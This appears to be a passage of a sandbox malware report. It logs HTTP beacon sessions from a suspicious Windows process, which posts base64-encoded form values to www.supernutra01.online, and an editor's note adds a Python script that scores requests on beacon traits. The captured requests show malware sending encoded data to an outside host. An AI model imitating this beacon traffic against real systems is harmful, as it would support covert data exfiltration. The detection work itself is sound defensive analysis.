                              Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                              Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to d
                              Dec 2, 2024 15:55:19.954734087 CET | 117 | IN | Data Raw: 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64
                              Data Ascii: isable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                              Dec 2, 2024 15:55:19.956495047 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              14 | 192.168.2.7 | 49983 | 104.21.24.198 | 80 | 5312 | C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Dec 2, 2024 15:55:21.244126081 CET | 835 | OUT | POST /jt56/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                              Accept-Language: en-US,en;q=0.9
                              Accept-Encoding: gzip, deflate, br
                              Host: www.supernutra01.online
                              Connection: close
                              Content-Length: 239
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: no-cache
                              Origin: http://www.supernutra01.online
                              Referer: http://www.supernutra01.online/jt56/
                              User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                              Data Raw: 63 4e 65 54 35 50 3d 36 4e 71 6a 49 2b 76 79 6b 48 78 31 33 37 37 73 67 2f 47 69 67 50 68 37 61 53 4c 63 47 4f 33 4d 78 6e 70 71 58 45 43 6e 44 73 69 4a 71 51 63 30 43 6e 37 46 73 43 79 67 70 75 6a 6c 44 38 56 6c 75 37 35 65 38 4a 77 70 6e 75 48 43 6f 6d 37 74 4e 39 4a 4f 58 67 39 54 7a 69 34 32 57 4f 36 4d 55 37 2b 38 68 4d 4e 63 49 65 6d 7a 79 56 57 41 44 75 59 65 4d 4a 6b 68 6f 50 56 7a 4b 71 4d 79 79 38 32 58 6d 4d 34 70 38 4d 71 54 44 79 48 42 39 77 4b 6a 49 45 4f 2f 7a 49 2b 65 2f 36 52 79 68 5a 2b 66 2f 46 73 38 77 6e 6e 56 4f 68 46 54 2b 69 63 64 75 68 6f 43 58 38 33 34 32 34 63 64 35 61 43 66 33 52 45 61 62 4b 7a 2f 57 41 79 39 30 34 52 33 2f 34 49 6d 2f 77 67 42 50 68 6c 4e 45 76 56 54 64 73 6f 3d
                              Data Ascii: cNeT5P=6NqjI+vykHx1377sg/GigPh7aSLcGO3MxnpqXECnDsiJqQc0Cn7FsCygpujlD8Vlu75e8JwpnuHCom7tN9JOXg9Tzi42WO6MU7+8hMNcIemzyVWADuYeMJkhoPVzKqMyy82XmM4p8MqTDyHB9wKjIEO/zI+e/6RyhZ+f/Fs8wnnVOhFT+icduhoCX83424cd5aCf3REabKz/WAy904R3/4Im/wgBPhlNEvVTdso=
                              Dec 2, 2024 15:55:22.669255018 CET | 1236 | IN | HTTP/1.1 405 Not Allowed
                              Date: Mon, 02 Dec 2024 14:55:22 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: close
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FOGBb1SrQngdHtuDtoVS2nVJ3YRakLm4INzvQuRaVAv%2BNDPfETm6%2FxB6wPZbPyu9gi5UOCq6uoVrgVQt%2BnZCJBUzxoY0qlyrz3unzCG8cWZ%2BeHcBv5b9tgdANKcFun0PsXfWPVqwOgGCXg%3D%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8ebc28540d979e08-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=12252&min_rtt=12252&rtt_var=6126&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=835&delivery_rate=0&cwnd=161&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                              Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                              Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding
                              Dec 2, 2024 15:55:22.669270992 CET | 126 | IN | Data Raw: 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45
                              Data Ascii: to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              15 | 192.168.2.7 | 49988 | 104.21.24.198 | 80 | 5312 | C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Dec 2, 2024 15:55:23.903778076 CET | 1848 | OUT | POST /jt56/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                              Accept-Language: en-US,en;q=0.9
                              Accept-Encoding: gzip, deflate, br
                              Host: www.supernutra01.online
                              Connection: close
                              Content-Length: 1251
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: no-cache
                              Origin: http://www.supernutra01.online
                              Referer: http://www.supernutra01.online/jt56/
                              User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                              Data Raw: 63 4e 65 54 35 50 3d 36 4e 71 6a 49 2b 76 79 6b 48 78 31 33 37 37 73 67 2f 47 69 67 50 68 37 61 53 4c 63 47 4f 33 4d 78 6e 70 71 58 45 43 6e 44 73 71 4a 71 46 41 30 41 45 6a 46 76 43 79 67 32 65 6a 6f 44 38 56 6b 75 37 68 53 38 4a 38 66 6e 6f 62 43 70 44 76 74 42 5a 64 4f 65 67 39 54 78 69 34 7a 56 2b 36 5a 55 37 75 34 68 4d 39 63 49 65 6d 7a 79 54 53 41 46 37 34 65 63 35 6b 69 2f 2f 55 6e 4f 71 4d 61 79 38 4f 59 6d 4d 4d 6d 39 38 4b 54 61 53 58 42 34 46 57 6a 4b 6b 4f 78 39 6f 2b 47 2f 36 63 73 68 5a 7a 73 2f 42 73 43 77 68 58 56 4c 48 30 66 71 67 49 42 2f 6a 4a 5a 55 36 2f 48 2f 6f 59 4b 2b 5a 71 77 35 54 51 62 66 70 33 6e 54 53 43 64 33 75 5a 31 75 36 45 56 36 43 67 61 50 57 73 53 51 4d 39 72 47 36 78 41 75 32 38 69 69 42 41 34 50 33 51 35 71 64 4b 47 47 38 2b 6e 2f 58 71 58 67 56 79 2b 39 37 69 56 7a 6f 36 67 6f 49 4b 50 73 6b 73 52 76 79 62 73 5a 34 2f 49 7a 57 2f 46 49 63 6a 4f 4e 47 64 7a 50 44 44 6e 46 4c 6a 75 56 51 6b 48 6b 65 5a 70 54 31 6b 66 32 6d 72 35 49 45 54 36 47 77 78 2f 6a 41 66 [TRUNCATED]
                              Data Ascii: cNeT5P=[TRUNCATED]
                              Dec 2, 2024 15:55:25.314714909 CET | 1236 | IN | HTTP/1.1 405 Not Allowed
                              Date: Mon, 02 Dec 2024 14:55:25 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: close
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W3dvmEDPp0Fbhg3IvM4RamTjIZeU4anjslNBIU75xEwc6qa%2FQX9CpmWxOgyfFcjt0UMx8doFzSheUVJbJpXrHF7KYw%2FfKLPDhysGu2HeteAZBTWCNrhNVDFbKrRmy%2FVe27OHuQ%2Brr8tyTg%3D%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8ebc2864ac1718fa-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=1918&min_rtt=1918&rtt_var=959&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1848&delivery_rate=0&cwnd=126&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                              Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                              Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to d
                              Dec 2, 2024 15:55:25.314733982 CET | 122 | IN | Data Raw: 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64
                              Data Ascii: isable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0
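                              Editor's note on sessions 10 to 16: what is worth detecting here is the request shape, not the two hostnames. Every request carries the same Android 5.1.1 / Moto G / Chrome 44 User-Agent, Connection: close and Cache-Control: no-cache, an Origin and Referer that merely restate the Host and path, a short single-segment path (/rfhq/, /jt56/), and either one base64-looking form parameter in a POST body or the same kind of value in a GET query string. Note also what the replies show: www.supernutra01.online answers every POST with 405 Not Allowed from nginx behind Cloudflare, and www.guacamask.online answers the GET with a generic consent-manager / adblock-detection page, so neither host is shown here actually processing the beacon. Treat both as indicators from this run, not as confirmed live C2. The Python below is an added example written for this page, not code from the report or from the sample; the function names, the ADTECH_MARKERS heuristic and the scoring are mine, and the two sample exchanges are constructed from sessions 12 and 13 above. The parameter name cNeT5P and the paths are sample-specific and are deliberately not matched on.

```python
"""Beacon triage for HTTP sessions printed the way the report above prints them.
Added example, not code from the report or the sample.  Scores a request on the
structural traits visible in sessions 10 to 16 and gives a rough verdict on the
reply.  The parameter name and paths are sample-specific and not matched on."""
import re
from dataclasses import dataclass, field
from urllib.parse import urlsplit

MOTO_G_UA = ("Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) "
             "AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 "
             "Chrome/44.0.2403.90 Mobile Safari/537.36")
B64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")
SHORT_PATH_RE = re.compile(r"^/[a-z0-9]{2,8}/$")
# heuristic: fragments (from the session 12 body) that mark a 200 reply as ad-tech boilerplate
ADTECH_MARKERS = ("consentmanager.net", "handleabpdetect", "px.js?ch=")


@dataclass
class HttpMessage:
    start: str                                   # request line or status line
    headers: dict = field(default_factory=dict)  # lower-cased header names
    body: str = ""


def parse_http(text: str) -> HttpMessage:
    """Split a raw HTTP request or response into start line, headers and body."""
    head, _, body = text.replace("\r\n", "\n").partition("\n\n")
    lines = head.strip("\n").split("\n")
    msg = HttpMessage(start=lines[0].strip(), body=body)
    for line in lines[1:]:
        name, _, value = line.partition(":")
        msg.headers[name.strip().lower()] = value.strip()
    return msg


def raw_pairs(qs: str) -> list:
    """Split name=value&... WITHOUT percent-decoding, so '+' and '/' in base64 survive."""
    return [tuple(p.split("=", 1)) if "=" in p else (p, "") for p in qs.split("&") if p]


def beacon_indicators(req: HttpMessage) -> list:
    """Names of the beacon traits the request exhibits, in a fixed order."""
    method, target = req.start.split(" ", 2)[:2]
    h, parts, host = req.headers, urlsplit(target), req.headers.get("host", "")
    hits = []
    if h.get("user-agent") == MOTO_G_UA:
        hits.append("fixed_moto_g_ua")
    if h.get("connection", "").lower() == "close" and h.get("cache-control", "").lower() == "no-cache":
        hits.append("close_nocache")
    if host and h.get("origin") == f"http://{host}" and h.get("referer") == f"http://{host}{parts.path}":
        hits.append("self_referencing_origin_referer")
    if SHORT_PATH_RE.match(parts.path):
        hits.append("short_single_segment_path")
    if method == "POST" and h.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        pairs = raw_pairs(req.body.strip())
        if len(pairs) == 1 and B64_RE.match(pairs[0][1]):
            hits.append("single_base64_form_param")
    if method == "GET" and any(B64_RE.match(v) for _, v in raw_pairs(parts.query)):
        hits.append("base64_in_query")
    return hits


def classify_response(resp: HttpMessage) -> str:
    """Rough verdict on what the contacted host did with the beacon."""
    fields = resp.start.split()
    status = fields[1] if len(fields) > 1 else ""
    if status == "405":
        return "rejected_405"
    if status == "200" and any(m in resp.body.lower() for m in ADTECH_MARKERS):
        return "adtech_boilerplate"
    return f"status_{status or 'unknown'}"


def triage_session(request_text: str, response_text: str = "") -> dict:
    """Score one request (score == number of traits hit) and classify its reply."""
    req = parse_http(request_text)
    hits = beacon_indicators(req)
    return {"host": req.headers.get("host", ""), "target": req.start.split(" ", 2)[1],
            "indicators": hits, "score": len(hits),
            "response": classify_response(parse_http(response_text)) if response_text else "none_captured"}


# Constructed samples modelled on session 13 (POST, 405 reply) and session 12 (GET, 200 reply).
SAMPLE_POST = "\r\n".join([
    "POST /jt56/ HTTP/1.1", "Host: www.supernutra01.online", "Connection: close",
    "Content-Length: 219", "Content-Type: application/x-www-form-urlencoded",
    "Cache-Control: no-cache", "Origin: http://www.supernutra01.online",
    "Referer: http://www.supernutra01.online/jt56/", "User-Agent: " + MOTO_G_UA, "",
    "cNeT5P=6NqjI+vykHx13ersmcuihvh4VyLcIu3IxnlqXF23DeGJzyE0Bm7F8Syg9+jkH8Unu70p8IMpnqXCokztNKlNWw9VnS4wV"
    "+6MU7+8hMoBIe+zxlGADL4dQZki//VzOqM2y82pmNUQ8PSTDz3B9iigBEO1+o/zv4cklb/g5XYj833kC3ExkAQxwwQ5T+TOheBo7bGH6zw7E9WVbST5iA=="])
SAMPLE_405 = ("HTTP/1.1 405 Not Allowed\r\nServer: cloudflare\r\nContent-Type: text/html\r\n\r\n"
              "<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1>"
              "</center><hr><center>nginx/1.26.2</center></body></html>")
SAMPLE_GET = "\r\n".join([
    "GET /rfhq/?cNeT5P=WCm/hpCimsJ9ehq7lKIv1VDyybMiIAv0Npn9YOFuJ9oZ3M+13oCVUFgjBEgQ3CHtpzgI5GBo5BBlGxqk"
    "DMLBAjerblAclHQGQEfPlkiGRydIYVrfr9hJQmq7K5VDFfSeZPk99y6g9Hkc&l0W=Yh8P HTTP/1.1",
    "Host: www.guacamask.online", "Connection: close", "User-Agent: " + MOTO_G_UA, "", ""])
SAMPLE_200 = ("HTTP/1.1 200 OK\r\nServer: Apache\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n"
              '<html><head><link rel="preconnect" href="https://delivery.consentmanager.net">'
              '<script src="http://www.guacamask.online/px.js?ch=2"></script></head></html>')
```

                              triage_session(SAMPLE_POST, SAMPLE_405) hits five of the six traits and reports rejected_405; triage_session(SAMPLE_GET, SAMPLE_200) hits three and reports adtech_boilerplate. The fixed User-Agent string and the single-parameter POST body are the cheapest pivots for a network rule, since the two hostnames seen here differ while the request shape does not; a plain browser request such as GET /index.html with a normal User-Agent scores zero.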


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              16 | 192.168.2.7 | 49989 | 104.21.24.198 | 80 | 5312 | C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Dec 2, 2024 15:55:26.571739912 CET | 534 | OUT | GET /jt56/?cNeT5P=3PCDLLbgpXdI7ZTJtsGfuMg/bmPFCu/6tWsXVWyqAde3py4xBHmx0QKjwMzGHP1esqkhpY0hgYiTwk+VbJ1wbQxw9SoOMJyFS7aCodBcGMHsrkiHFt0aNasFqY1YB+AO+7j098ky2tOd&l0W=Yh8P HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                              Accept-Language: en-US,en;q=0.9
                              Host: www.supernutra01.online
                              Connection: close
                              User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                              Dec 2, 2024 15:55:27.961287975 CET | 1236 | IN | HTTP/1.1 200 OK
                              Date: Mon, 02 Dec 2024 14:55:27 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: close
                              Last-Modified: Tue, 24 Sep 2024 07:18:31 GMT
                              Accept-Ranges: bytes
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fXejZbvBvgEd9Yc%2Fpt69DvsiEFGLN2uK%2FOL%2BidHpFYAw95RqCVYjZt9%2FWgK%2BSgfmprJSpt%2B9A3fIat3WRk0lvmD67gaIZjxo0cc6qo0HdVQLiybaRMHyLZ5ygBGCMW%2FjyAHZBaE8B7qIlw%3D%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8ebc287528f10c7e-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=1635&min_rtt=1635&rtt_var=817&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=534&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                              Data Raw: 32 64 61 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 09 3c 73 74 79 6c 65 3e 0a 09 09 40 69 6d 70 6f 72 74 20 75 72 6c 28 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 [TRUNCATED]
                              Data Ascii: 2dae<!DOCTYPE html><html lang="en"><head><title>FASTPANEL</title><meta charset="UTF-8"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex,nofollow"><style>@import url('https://fonts.googleapis.com/css?family=Roboto:regular,500&display=swap');::after,::bef
                              Dec 2, 2024 15:55:27.961313009 CET1236INData Raw: 6f 72 65 2c 61 2c 6c 61 62 65 6c 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 6d 61 69 6e 2c 2e 77 72 61 70 70 65 72 7b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e
                              Data Ascii: ore,a,label{display:inline-block}.main,.wrapper{flex-direction:column}.window-main,.window-main__item{position:relative}*{padding:0;margin:0;border:0}*,::after,::before{box-sizing:border-box}body,html{height:100%;min-width:320px}body{color:#ff
                              Dec 2, 2024 15:55:27.961338043 CET1236INData Raw: 77 2d 6d 61 69 6e 20 2e 73 76 67 2d 6f 6e 65 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 2d 32 34 30 70 78 3b 72 69 67 68 74 3a 2d 33 36 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 2d 31 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 20
                              Data Ascii: w-main .svg-one{position:absolute;top:-240px;right:-360px;z-index:-1}.window-main .svg-two{position:absolute;bottom:-258px;left:-223px;z-index:-1}.window-main__title{text-align:center;padding-bottom:1.875rem;position:relative;font-weight:500;l
                              Dec 2, 2024 15:55:27.961352110 CET1236INData Raw: 5f 6c 69 73 74 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 2e 36 38 37 35 72 65 6d 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 69 74 65 6d 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 2e 38 37 35 72 65 6d 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77
                              Data Ascii: _list{padding-left:.6875rem}.window-main__item{padding-left:.875rem}}@media (max-width:20em){.window-main{padding:1.5rem}.window-main__title{font-size:1.5rem}.window-main__body{margin-top:1.5rem;font-size:.875rem}.window-main__info{margin-bott
                              Dec 2, 2024 15:55:27.961374998 CET1236INData Raw: 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 2d 30 2e 32 35 36 30 39 37 35 36 31 72 65 6d 20 2b 20 38 2e 37 38 30 34 38 37 38 30 34 39 76 77 20 2c 33 2e 37 35 72 65 6d 29 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a
                              Data Ascii: lamp(1.5rem ,-0.256097561rem + 8.7804878049vw ,3.75rem)){.window-main{padding-top:clamp(1.5rem ,-.256097561rem + 8.7804878049vw ,3.75rem)}}@supports not (padding-top:clamp(1.5rem ,-0.256097561rem + 8.7804878049vw ,3.75rem)){.window-main{paddin
                              Dec 2, 2024 15:55:27.961390018 CET1236INData Raw: 6c 63 28 2e 38 37 35 72 65 6d 20 2b 20 2e 31 38 37 35 2a 28 31 30 30 76 77 20 2d 20 32 30 72 65 6d 29 2f 20 32 35 2e 36 32 35 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 28 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d
                              Data Ascii: lc(.875rem + .1875*(100vw - 20rem)/ 25.625)}}@supports (margin-bottom:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)){.window-main__info{margin-bottom:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)}}@supports not (margin-
